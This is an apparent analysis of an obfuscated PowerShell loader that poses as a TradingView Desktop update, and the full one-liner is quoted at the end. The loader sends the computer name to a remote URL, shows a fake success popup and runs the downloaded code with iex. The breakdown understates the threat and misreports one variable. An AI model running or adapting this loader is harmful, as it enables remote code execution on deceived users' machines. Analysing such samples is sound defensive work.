This PowerShell script seems to be executing a series of commands to establish a network connection, retrieve data from a specific URL, and display a popup message indicating the success status. Let's break down the code into key components:
1. Variable Definitions:
- $launch: Set to 'launch'
- $update: Set to 'update'
- $TWDesktop: Set to ''
- $flow: Set to 'flow'
- $ai: Set to 'htt'
- $model: Set to 'ps://ea'
- $dev: Constructed by concatenating $ai, $model, $TWDesktop, $flow, $launch, and $env:computername
- $status: Set to 'TradingView Desktop updated!'
2. Setting Security Protocol:
- Sets the security protocol of the service point manager to TLS 1.2.
3. Making a Web Request:
- Uses the Invoke-WebRequest cmdlet (iwr) to send a request to the URL stored in $dev
- Parameters used: -UseBasicParsing (prevents loading unnecessary elements), -UserAgent (specifies the user agent string)
4. Displaying Popup Message:
- Creates a Wscript.Shell COM object
- Generates a popup message using the Popup method of Wscript.Shell
- Message: $status
- Timeout: 180 seconds
- Title: 'Success'
- Icon style: 0x0
5. Executing the Retrieved Content:
- Uses the Invoke-Expression cmdlet (iex) to execute the content retrieved from the URL
Overall, this script appears to be initiating a connection to a specific URL and then executing the received content, with a final popup indicating success. The purpose and content of the URL being referenced are not specified in the extracted code. Using Invoke-WebRequest and Invoke-Expression to execute content from a remote source carries potential security risks and should be approached with caution.
1 powershell -c "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; $dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; [nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/'; $command=New-Object -ComObject Wscript.Shell; $status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"